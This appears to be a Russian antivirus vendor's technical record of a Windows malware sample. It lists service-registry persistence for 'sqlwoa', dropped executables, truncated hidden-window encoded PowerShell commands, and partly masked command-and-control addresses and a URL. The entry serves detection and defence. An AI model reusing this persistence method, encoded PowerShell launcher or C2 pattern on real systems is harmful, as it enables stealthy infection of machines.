Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\sqlwoa] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\sqlwoa] 'ImagePath' = '"%WINDIR%\SysWOW64\mspatcha\sqlwoa.exe"'
- 'sqlwoa' "%WINDIR%\SysWOW64\mspatcha\sqlwoa.exe"
- 'sqlwoa' %WINDIR%\SysWOW64\mspatcha\sqlwoa.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGkAOQBpADcAYgBvAD0AKAAoACcATQBfACcAKwAnAGYAcAAnACkAKwAoACcAYQBpACcAKwAnAGEAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AVgA6AFQARQBtAFAAXAB3AE8AUgBkAFwAMgAwAD...
- %TEMP%\word\2019\wn9hhuf7.exe
- %WINDIR%\syswow64\mspatcha\sqlwoa.exe
- %TEMP%\word\2019\wn9hhuf7.exe в %WINDIR%\syswow64\mspatcha\sqlwoa.exe
- '17#.#5.13.118':80
- '45.#5.36.51':443
- http://45.##.36.51:443/4Zis5noTvOw0M/IrOC5XA45THDnWc5/ via 45.#5.36.51
- '%TEMP%\word\2019\wn9hhuf7.exe'
- '%WINDIR%\syswow64\mspatcha\sqlwoa.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGkAOQBpADcAYgBvAD0AKAAoACcATQBfACcAKwAnAGYAcAAnACkAKwAoACcAYQBpACcAKwAnAGEAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AVgA6AFQARQBtAFAAXAB3AE8AUgBkAFwAMgAwAD...' (со скрытым окном)